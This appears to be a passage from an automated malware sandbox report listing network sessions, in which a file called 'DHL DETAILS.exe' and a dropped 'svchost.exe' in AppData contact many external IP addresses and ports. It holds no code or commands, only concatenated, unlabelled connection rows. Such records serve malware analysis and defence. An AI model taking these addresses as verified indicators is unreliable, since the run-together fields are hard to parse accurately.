                                                                                    5516192.168.2.5532061.0.0.13806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5517192.168.2.553209104.25.42.178806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5518192.168.2.552589118.184.157.111806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5519192.168.2.5528278.210.80.191156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5520192.168.2.552909134.209.29.12031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5521192.168.2.550855120.78.191.225806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5522192.168.2.55254664.43.89.8263416352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5523192.168.2.5527548.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5524192.168.2.55098980.80.162.81108056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5525192.168.2.552804191.101.78.20731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5526192.168.2.563966162.0.220.2222052356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5527192.168.2.55365691.231.186.1334436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5528192.168.2.553330172.67.181.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5529192.168.2.55269291.134.140.16025726352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5530192.168.2.55101958.69.117.280826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5531192.168.2.55327367.201.33.10252836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5532192.168.2.553502172.67.3.108806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5533192.168.2.55298060.188.102.225180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5534192.168.2.552983195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5535192.168.2.552936125.94.219.9690916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5536192.168.2.55301237.18.73.6055666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5537192.168.2.552853154.85.125.23564466352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5538192.168.2.55304447.100.207.11780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5539192.168.2.553030185.100.233.101411386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5540192.168.2.553035217.23.11.194327086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5541192.168.2.55307189.168.121.17531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5542192.168.2.55344873.151.59.35208166352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5543192.168.2.553142193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5544192.168.2.5533293.97.176.25131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5545192.168.2.552576223.113.80.15890916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5546192.168.2.55278043.231.22.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5547192.168.2.550373192.111.137.3541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5548192.168.2.55338194.131.64.157583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5549192.168.2.553057176.119.25.1331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5550192.168.2.5531513.9.71.16731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5551192.168.2.553007222.220.102.15980006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5552192.168.2.553027218.65.6.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5553192.168.2.553318133.18.234.13806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5554192.168.2.553632104.20.225.218806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5555192.168.2.55336943.163.192.3156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5556192.168.2.55314639.99.144.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5557192.168.2.553147103.166.141.74200746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5558192.168.2.55285494.131.60.2065837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5559192.168.2.553149103.23.100.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5560192.168.2.55332218.133.16.21806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5561192.168.2.553731200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5562192.168.2.553751200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5563192.168.2.553752200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5564192.168.2.553753200.111.182.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5565192.168.2.55327443.131.242.162156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5566192.168.2.553343119.28.60.6480906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5567192.168.2.553263220.248.70.23790026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5568192.168.2.553650192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5569192.168.2.55332151.89.173.40607756352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5570192.168.2.55328351.75.206.209806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5571192.168.2.552930122.114.232.1378086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5572192.168.2.54932045.76.150.195068556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5573192.168.2.55327262.33.53.24831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5574192.168.2.55348582.113.157.122312806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5575192.168.2.551468184.178.172.1741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5576192.168.2.55341694.130.94.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5577192.168.2.553193139.99.148.9031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5578192.168.2.5532988.219.97.248806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5579192.168.2.553505195.90.216.7510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5580192.168.2.55337247.106.76.19680886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5581192.168.2.55309294.131.59.2415837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5582192.168.2.553491193.239.56.8480816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5583192.168.2.550741117.160.250.16399906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5584192.168.2.553532154.12.178.107299856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5585192.168.2.55365838.162.15.9831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5586192.168.2.553454216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5587192.168.2.55125916.162.211.9010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5588192.168.2.553523219.243.212.11880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5589192.168.2.55350947.243.205.131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5590192.168.2.553660162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5591192.168.2.55127634.95.243.12280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5592192.168.2.553558194.163.137.10690506352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5593192.168.2.55350682.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5594192.168.2.553159157.230.254.8831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5595192.168.2.551498199.188.93.21490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5596192.168.2.553614185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5597192.168.2.553569128.199.252.3680006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5598192.168.2.553690185.162.229.215806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5599192.168.2.553706172.67.105.234806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5600192.168.2.55338194.131.64.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5601192.168.2.5536398.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5602192.168.2.55354335.154.71.7210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5603192.168.2.552494117.160.250.138806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5604192.168.2.551296167.99.174.59806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5605192.168.2.553800162.159.246.135806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5606192.168.2.55150268.169.60.22083806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5607192.168.2.553874172.64.80.55806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5608192.168.2.551257103.146.137.510816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5609192.168.2.553737209.126.104.38400536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5610192.168.2.553920104.20.67.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5611192.168.2.552633111.59.4.8890026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5612192.168.2.55149438.162.0.22131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5613192.168.2.553964104.19.79.238806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5614192.168.2.55283136.134.91.8288886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5615192.168.2.55370418.135.133.11631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5616192.168.2.553998104.21.223.181806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5617192.168.2.55366149.228.131.16950006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5618192.168.2.551336128.199.221.91502236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5619192.168.2.55396867.201.33.10252836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5620192.168.2.55364893.171.220.22988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5621192.168.2.554077162.159.241.5806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5622192.168.2.553649123.241.210.123806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5623192.168.2.56224351.222.241.157571756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5624192.168.2.55366943.133.136.20888006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5625192.168.2.549428129.151.72.858056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5626192.168.2.56417334.23.45.2238056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5627192.168.2.554187104.16.106.154806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5628192.168.2.553854121.159.146.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5629192.168.2.551505139.129.202.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5630192.168.2.554320192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5631192.168.2.55401838.162.3.17531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5632192.168.2.554299147.182.195.54560226352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5633192.168.2.553892218.255.187.60806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5634192.168.2.55389746.229.253.6731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5635192.168.2.55419538.162.23.12731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5636192.168.2.553760202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5637192.168.2.553957119.196.168.183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5638192.168.2.55466843.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5639192.168.2.554459104.23.125.117806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5640192.168.2.55420994.131.60.199583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5641192.168.2.553959130.162.213.17531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5642192.168.2.55466943.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5643192.168.2.55467043.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5644192.168.2.55472643.153.71.584436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5645192.168.2.553238117.160.250.131806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5646192.168.2.553974172.104.251.179806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5647192.168.2.55148513.234.24.11610806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5648192.168.2.554049147.75.92.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5649192.168.2.55400545.120.178.19710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5650192.168.2.55402113.37.89.20131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5651192.168.2.553719138.2.73.15710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5652192.168.2.55400760.246.122.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5653192.168.2.554382198.37.57.112806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5654192.168.2.55380447.91.104.8831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
